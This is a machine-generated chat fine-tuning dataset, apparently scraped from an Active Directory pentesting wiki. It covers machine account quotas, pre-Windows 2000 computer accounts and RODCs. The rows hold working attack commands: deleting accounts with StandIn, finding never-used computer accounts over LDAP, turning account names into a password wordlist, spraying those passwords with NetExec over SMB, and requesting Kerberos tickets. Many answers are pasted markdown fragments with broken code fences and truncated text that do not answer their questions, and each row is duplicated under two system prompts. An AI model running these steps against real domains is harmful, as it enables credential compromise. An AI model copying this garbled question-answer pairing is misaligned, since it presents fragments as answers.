Create a computer account", "metadata": {"corpus_index": 215, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Delete the account (requires elevated rights)?"}, {"role": "assistant", "content": "StandIn.exe --computer 'PENTEST01' --delete\n``\n\n:::\n\n> [!TIP]\n> Testers need to be aware that the MAQ attribute set to a non-zero value doesn't necessarily mean the users can create machine accounts. The right to add workstations to a domain can in fact be changed in the Group Policies. Group Policy Management Console (gpmc.msc) > Domain Controllers OU > Domain Controllers Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assigments > Add workstations to domain`"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Delete the account (requires elevated rights)?", "response": "StandIn.exe --computer 'PENTEST01' --delete\n``\n\n:::\n\n> [!TIP]\n> Testers need to be aware that the MAQ attribute set to a non-zero value doesn't necessarily mean the users can create machine accounts. The right to add workstations to a domain can in fact be changed in the Group Policies. Group Policy Management Console (gpmc.msc) > Domain Controllers OU > Domain Controllers Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assigments > Add workstations to domain`", "metadata": {"corpus_index": 216, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Delete the account (requires elevated rights)?"}, {"role": "assistant", "content": "StandIn.exe --computer 'PENTEST01' --delete\n``\n\n:::\n\n> [!TIP]\n> Testers need to be aware that the MAQ attribute set to a non-zero value doesn't necessarily mean the users can create machine accounts. The right to add workstations to a domain can in fact be changed in the Group Policies. Group Policy Management Console (gpmc.msc) > Domain Controllers OU > Domain Controllers Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assigments > Add workstations to domain`"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Delete the account (requires elevated rights)?", "response": "StandIn.exe --computer 'PENTEST01' --delete\n``\n\n:::\n\n> [!TIP]\n> Testers need to be aware that the MAQ attribute set to a non-zero value doesn't necessarily mean the users can create machine accounts. The right to add workstations to a domain can in fact be changed in the Group Policies. Group Policy Management Console (gpmc.msc) > Domain Controllers OU > Domain Controllers Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assigments > Add workstations to domain`", "metadata": {"corpus_index": 216, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Pre-Windows 2000 computers - Theory work?"}, {"role": "assistant", "content": "When a new computer account is configured as \"pre-Windows 2000 computer\", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.\n\nOnce an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Pre-Windows 2000 computers - Theory work?", "response": "When a new computer account is configured as \"pre-Windows 2000 computer\", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.\n\nOnce an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed.", "metadata": {"corpus_index": 217, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Pre-Windows 2000 computers - Theory?"}, {"role": "assistant", "content": "When a new computer account is configured as \"pre-Windows 2000 computer\", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.\n\nOnce an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Pre-Windows 2000 computers - Theory?", "response": "When a new computer account is configured as \"pre-Windows 2000 computer\", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.\n\nOnce an authentication occurs for a pre-Windows 2000 computer, according to TrustedSec's blogpost, its password will usually need to be changed.", "metadata": {"corpus_index": 217, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Pre-Windows 2000 computers - Practice in the context of penetration testing"}, {"role": "assistant", "content": "Finding computer accounts that have been \"pre-created\" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):\n\n* 32 - PASSWD_NOTREQD\n* 4096 - WORKSTATION_TRUST_ACCOUNT\n\nThe logonCount attribute can be filtered as well.\n\nThe ldapsearch-ad tool can be used to find such accounts. Once \"pre-created\" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with NetExec (Python) for instance.\n\n```powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Pre-Windows 2000 computers - Practice in the context of penetration testing", "response": "Finding computer accounts that have been \"pre-created\" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):\n\n* 32 - PASSWD_NOTREQD\n* 4096 - WORKSTATION_TRUST_ACCOUNT\n\nThe logonCount attribute can be filtered as well.\n\nThe ldapsearch-ad tool can be used to find such accounts. Once \"pre-created\" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with NetExec (Python) for instance.\n\n```powershell", "metadata": {"corpus_index": 218, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pre-Windows 2000 computers - Practice"}, {"role": "assistant", "content": "Finding computer accounts that have been \"pre-created\" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):\n\n* 32 - PASSWD_NOTREQD\n* 4096 - WORKSTATION_TRUST_ACCOUNT\n\nThe logonCount attribute can be filtered as well.\n\nThe ldapsearch-ad tool can be used to find such accounts. Once \"pre-created\" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with NetExec (Python) for instance.\n\n```powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pre-Windows 2000 computers - Practice", "response": "Finding computer accounts that have been \"pre-created\" (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags):\n\n* 32 - PASSWD_NOTREQD\n* 4096 - WORKSTATION_TRUST_ACCOUNT\n\nThe logonCount attribute can be filtered as well.\n\nThe ldapsearch-ad tool can be used to find such accounts. Once \"pre-created\" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with NetExec (Python) for instance.\n\n```powershell", "metadata": {"corpus_index": 218, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 1. find pre-created accounts that never logged on?"}, {"role": "assistant", "content": "ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 1. find pre-created accounts that never logged on?", "response": "ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt", "metadata": {"corpus_index": 219, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 1. find pre-created accounts that never logged on?"}, {"role": "assistant", "content": "ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 1. find pre-created accounts that never logged on?", "response": "ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&(userAccountControl=4128)(logonCount=0))' | tee results.txt", "metadata": {"corpus_index": 219, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 2. extract the sAMAccountNames of the results work?"}, {"role": "assistant", "content": "cat results.txt | grep \"sAMAccountName\" | awk '{print $4}' | tee computers.txt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 2. extract the sAMAccountNames of the results work?", "response": "cat results.txt | grep \"sAMAccountName\" | awk '{print $4}' | tee computers.txt", "metadata": {"corpus_index": 220, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 2. extract the sAMAccountNames of the results"}, {"role": "assistant", "content": "cat results.txt | grep \"sAMAccountName\" | awk '{print $4}' | tee computers.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 2. extract the sAMAccountNames of the results", "response": "cat results.txt | grep \"sAMAccountName\" | awk '{print $4}' | tee computers.txt", "metadata": {"corpus_index": 220, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names?"}, {"role": "assistant", "content": "cat results.txt | grep \"sAMAccountName\" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names?", "response": "cat results.txt | grep \"sAMAccountName\" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt", "metadata": {"corpus_index": 221, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names"}, {"role": "assistant", "content": "cat results.txt | grep \"sAMAccountName\" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 3. create a wordlist of passwords matching the Pre-Windows 2000 generation, based on the account names", "response": "cat results.txt | grep \"sAMAccountName\" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt", "metadata": {"corpus_index": 221, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 4. bruteforce, line per line (user1:password1, user2:password2, ...)?"}, {"role": "assistant", "content": "nxc smb $DC_IP -u \"computers.txt\" -p \"passwords.txt\" --no-bruteforce\n``\n\n> You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)\n\nTesters can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.py, kpasswd.py, etc.) in order to use it.\n\n> [!SUCCESS]\n> Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)\n> \n> `bash\n> getTGT.py $DOMAIN/$COMPUTER_NAME\\$:$COMPUTER_PASSWORD\n> ``\n> \n> The ticket obtained can then be used with ptt.md"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 4. bruteforce, line per line (user1:password1, user2:password2, ...)?", "response": "nxc smb $DC_IP -u \"computers.txt\" -p \"passwords.txt\" --no-bruteforce\n``\n\n> You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)\n\nTesters can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.py, kpasswd.py, etc.) in order to use it.\n\n> [!SUCCESS]\n> Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)\n> \n> `bash\n> getTGT.py $DOMAIN/$COMPUTER_NAME\\$:$COMPUTER_PASSWORD\n> ``\n> \n> The ticket obtained can then be used with ptt.md", "metadata": {"corpus_index": 222, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 4. bruteforce, line per line (user1:password1, user2:password2, ...)"}, {"role": "assistant", "content": "nxc smb $DC_IP -u \"computers.txt\" -p \"passwords.txt\" --no-bruteforce\n``\n\n> You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)\n\nTesters can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.py, kpasswd.py, etc.) in order to use it.\n\n> [!SUCCESS]\n> Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)\n> \n> `bash\n> getTGT.py $DOMAIN/$COMPUTER_NAME\\$:$COMPUTER_PASSWORD\n> ``\n> \n> The ticket obtained can then be used with ptt.md"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 4. bruteforce, line per line (user1:password1, user2:password2, ...)", "response": "nxc smb $DC_IP -u \"computers.txt\" -p \"passwords.txt\" --no-bruteforce\n``\n\n> You will see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when you have guessed the correct password for a computer account that has not been used yet. (trustedsec.com)\n\nTesters can then change the Pre-Windows 2000 computer accounts' password (i.e. rpcchangepwd.py, kpasswd.py, etc.) in order to use it.\n\n> [!SUCCESS]\n> Alternatively, Filip Dragovic was able to authenticate using Kerberos without having to change the account's password. (source)\n> \n> `bash\n> getTGT.py $DOMAIN/$COMPUTER_NAME\\$:$COMPUTER_PASSWORD\n> ``\n> \n> The ticket obtained can then be used with ptt.md", "metadata": {"corpus_index": 222, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/pre-windows-2000-computers.md", "page_title": "Pre-Windows 2000 computers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe RODC - Theory in the context of penetration testing"}, {"role": "assistant", "content": "> The read-only Domain Controller (RODC) is a solution that Microsoft introduced for physical locations that don’t have adequate security to host a Domain Controller but still require directory services for resources in those locations. A branch office is the classic use case.\n>\n> (By Elad Shamir on specterops.io)\n\nRODC holds a read-only filtered copy of the Active Directory database with all the sensitives attributes deleted, like the LAPS passwords (this refers to RODC Filtered Attribute Set#rodc-fas) (FAS)), and cache only specific credentials."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe RODC - Theory in the context of penetration testing", "response": "> The read-only Domain Controller (RODC) is a solution that Microsoft introduced for physical locations that don’t have adequate security to host a Domain Controller but still require directory services for resources in those locations. A branch office is the classic use case.\n>\n> (By Elad Shamir on specterops.io)\n\nRODC holds a read-only filtered copy of the Active Directory database with all the sensitives attributes deleted, like the LAPS passwords (this refers to RODC Filtered Attribute Set#rodc-fas) (FAS)), and cache only specific credentials.", "metadata": {"corpus_index": 223, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through RODC - Theory"}, {"role": "assistant", "content": "> The read-only Domain Controller (RODC) is a solution that Microsoft introduced for physical locations that don’t have adequate security to host a Domain Controller but still require directory services for resources in those locations. A branch office is the classic use case.\n>\n> (By Elad Shamir on specterops.io)\n\nRODC holds a read-only filtered copy of the Active Directory database with all the sensitives attributes deleted, like the LAPS passwords (this refers to RODC Filtered Attribute Set#rodc-fas) (FAS)), and cache only specific credentials."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through RODC - Theory", "response": "> The read-only Domain Controller (RODC) is a solution that Microsoft introduced for physical locations that don’t have adequate security to host a Domain Controller but still require directory services for resources in those locations. A branch office is the classic use case.\n>\n> (By Elad Shamir on specterops.io)\n\nRODC holds a read-only filtered copy of the Active Directory database with all the sensitives attributes deleted, like the LAPS passwords (this refers to RODC Filtered Attribute Set#rodc-fas) (FAS)), and cache only specific credentials.", "metadata": {"corpus_index": 223, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe RODC - RODC Management in the context of penetration testing"}, {"role": "assistant", "content": "As any Active Directory object, an RODC has an attribute named managedBy. Any user or group specified in the attribute has local administrative rights on the RODC. From an attacker point of view, this means that compromising an account listed in the managedBy attribute leads to an RODC admin access. And with sufficient rights to modify this attribute, an attacker can promote himself to RODC admin."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe RODC - RODC Management in the context of penetration testing", "response": "As any Active Directory object, an RODC has an attribute named managedBy. Any user or group specified in the attribute has local administrative rights on the RODC. From an attacker point of view, this means that compromising an account listed in the managedBy attribute leads to an RODC admin access. And with sufficient rights to modify this attribute, an attacker can promote himself to RODC admin.", "metadata": {"corpus_index": 224, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do RODC - RODC Management"}, {"role": "assistant", "content": "As any Active Directory object, an RODC has an attribute named managedBy. Any user or group specified in the attribute has local administrative rights on the RODC. From an attacker point of view, this means that compromising an account listed in the managedBy attribute leads to an RODC admin access. And with sufficient rights to modify this attribute, an attacker can promote himself to RODC admin."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do RODC - RODC Management", "response": "As any Active Directory object, an RODC has an attribute named managedBy. Any user or group specified in the attribute has local administrative rights on the RODC. From an attacker point of view, this means that compromising an account listed in the managedBy attribute leads to an RODC admin access. And with sufficient rights to modify this attribute, an attacker can promote himself to RODC admin.", "metadata": {"corpus_index": 224, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about RODC - Authentication with an RODC?"}, {"role": "assistant", "content": "To authenticate a principal locally, the RODC must be allowed to retrieve his credentials. Only users, groups and computers that are in the msDS-RevealOnDemandGroup and not in msDS-NeverRevealGroup may have their credentials cached#credential-caching) on the RODC to be used for future local authentication (in this case, their principal name IDs are added to its msDS-Revealed-List attribute). The attributes msDS-RevealOnDemandGroup and msDS-NeverRevealGroup define the Password Replication Policy) of the RODC.\n\n> The default PRP (Password Replication Policy) specifies that no account passwords can be cached on any RODC, and certain accounts are explicitly denied from being cached on any RODC.\\\n> (Microsoft#credential-caching))\n\nIn case the RODC has cached the principal's credentials and thus, is able to authenticate it locally, it will issue a TGT. To do so, the RODC holds a derived version of the krbtgt key named krbtgt_XXXXX(where XXXXX is its random version number) and uses it to sign and encrypt the generated TGT. This krbtgt account's version number can also be found in its msDS-SecondaryKrbTgtNumber attribute. \n\n> [!TIP]\n> The RODC computer account has reset rights on the account krbtgt_XXXXX's password.\n\nWhen the RODC generates the TGT, it indicates in the kvno field the version number of the key used to generate the ticket. With this TGT, it is possible to request a Service Ticket (ST) against the RODC or any accessible standard writable Domain Controller (provided that the principal is listed in msDS-RevealOnDemandGroup and not listed in msDS-NeverRevealGroup).\n\n![]()\n\nRODC authentication flow{.caption}\n\n![]()\n\nRODC service access flow{.caption}"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about RODC - Authentication with an RODC?", "response": "To authenticate a principal locally, the RODC must be allowed to retrieve his credentials. Only users, groups and computers that are in the msDS-RevealOnDemandGroup and not in msDS-NeverRevealGroup may have their credentials cached#credential-caching) on the RODC to be used for future local authentication (in this case, their principal name IDs are added to its msDS-Revealed-List attribute). The attributes msDS-RevealOnDemandGroup and msDS-NeverRevealGroup define the Password Replication Policy) of the RODC.\n\n> The default PRP (Password Replication Policy) specifies that no account passwords can be cached on any RODC, and certain accounts are explicitly denied from being cached on any RODC.\\\n> (Microsoft#credential-caching))\n\nIn case the RODC has cached the principal's credentials and thus, is able to authenticate it locally, it will issue a TGT. To do so, the RODC holds a derived version of the krbtgt key named krbtgt_XXXXX(where XXXXX is its random version number) and uses it to sign and encrypt the generated TGT. This krbtgt account's version number can also be found in its msDS-SecondaryKrbTgtNumber attribute. \n\n> [!TIP]\n> The RODC computer account has reset rights on the account krbtgt_XXXXX's password.\n\nWhen the RODC generates the TGT, it indicates in the kvno field the version number of the key used to generate the ticket. With this TGT, it is possible to request a Service Ticket (ST) against the RODC or any accessible standard writable Domain Controller (provided that the principal is listed in msDS-RevealOnDemandGroup and not listed in msDS-NeverRevealGroup).\n\n![]()\n\nRODC authentication flow{.caption}\n\n![]()\n\nRODC service access flow{.caption}", "metadata": {"corpus_index": 225, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/rodc.md", "page_title": "RODC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do RODC - Authentication with an RODC"}, {"role": "assistant", "content": "To authenticate a principal locally, the RODC must be allowed to retrieve his credentials. Only users, groups and computers that are in the msDS-RevealOnDemandGroup and not in msDS-NeverRevealGroup may have their credentials cached#credential-caching) on the RODC to be used for future local authentication (in this case, their principal name IDs are added to its msDS-Revealed-List attribute). The attributes msDS-RevealOnDemandGroup and msDS-NeverRevealGroup define the Password Replication Policy) of the RODC.\n\n> The default PRP (Password Replication Policy) specifies that no account passwords can be cached on any RODC, and certain accounts are explicitly denied from being cached on any RODC.\\\n> (Microsoft#credential-caching))\n\nIn case the RODC has cached the principal's credentials and thus, is able to authenticate it locally, it will issue a TGT. To do so, the RODC holds a derived version of the krbtgt key named krbtgt_XXXXX(where XXXXX is its random version number) and uses it to sign and encrypt the generated TGT. This krbtgt account's version number can also be found in its msDS-SecondaryKrbTgtNumber attribute. \n\n> [!TIP]\n> The RODC computer account has reset rights on the account krbtgt_XXXXX's password.\n\nWhen the RODC generates the TGT, it indicates in the kvno field the version number of the key used to generate the ticket. With this TGT, it is possible to request a Service Ticket (ST) against the RODC or any accessible standard writable Domain Controller (provided that the principal is listed in msDS-RevealOnDemandGroup and not listed in msDS-NeverRevealGroup).\n\n![]()\n\nRODC authentication flow{.caption}\n\n![]()\n\nRODC service access flow{.caption}"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do RODC - Authentication with an RODC", "response": "To authenticate a principal locally, the RODC must be allowed to retrieve his credentials. Only users, groups and computers that are in the msDS-RevealOnDemandGroup and not in msDS-NeverRevealGroup may have their credentials cached#credential-caching) on the RODC to be used for future local authentication (in this case, their principal name IDs are added to its msDS-Revealed-List attribute). The attributes msDS-RevealOnDemandGroup and msDS-NeverRevealGroup define the Password Replication Policy) of the RODC.\n\n> The default PRP (Password Replication Policy) specifies that no account 